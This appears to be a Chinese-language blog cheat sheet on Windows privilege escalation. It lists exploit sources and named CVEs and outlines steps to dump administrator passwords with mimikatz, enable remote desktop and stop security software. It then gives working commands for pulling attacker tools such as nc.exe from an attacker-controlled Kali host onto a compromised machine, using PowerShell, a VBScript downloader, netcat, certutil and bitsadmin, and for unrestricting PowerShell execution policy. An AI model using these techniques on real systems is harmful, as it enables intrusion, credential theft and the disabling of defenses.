windows提权

1. 漏洞收集 0day库

  1. exploit-db
  2. 0da’y
  3. https://securitytracker.com/
  4. https://www.rapid7.com/db/modules/
  5. https://cxsecurity.com/

2. cve-2018-8120、cve-2018-8897、cve-2018-8174

  1. 使用exploit进行提权
  2. 使用mimikatz抓管理员密码
  3. 使用命令行开启远程桌面
  4. 使用账号密码连接

3. 停止安全软件相关服务

4. 文件传输三十六计

4.1 windows文件传输

  1. 使用powershell下载
    • 首先在kali 的 /var/www/html放入你的exe文件比如说nc.exe
    • powershell输入如下命令
      `
      $p=New-Object system.net.webclient.

$p.downloadfile(“http://192.168.178.200/nc.exe","nc.exe")


-  也可以将上述命令存储在ps1文件中执行,但是默认情况下是无法执行powershell脚本的,需要在管理员权限下修改配置

powershell set-executionpolicy unrestricted



2.  Visual Basic 文件下载

``` vbscript
Set args = Wscript.Arguments
Url = "http://192.168.178.200/nc.exe"
dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", Url, False
xHttp.Send
with bStrm
    .type = 1 '
    .open
    .write xHttp.responseBody
    .savetofile " C:\nc.exe", 2 '
end with

cmd下执行 cscript test.vbs

由于是users组用户所以不能直接放在c盘权限不够

  1. nc传输
    发送方cmd下执行:

nc.exe -L -p 8888 <test.vbs

接收方执行
nc.exe 192.168.1.105 8888 >test.vbs

  1. 使用certutil
    certutil -urlcache -split -f http://192.168.178.200/nc.exe nc.exe

  2. 使用bitsadmin

bitsadmin /transfer n http://domain/file c:\%homepath%\file

  1. ftp
  2. Windows Share File Download
  3. tftp

  4. ipc文件下载/上传/登陆


  转载请注明: 星晴 windows提权

  目录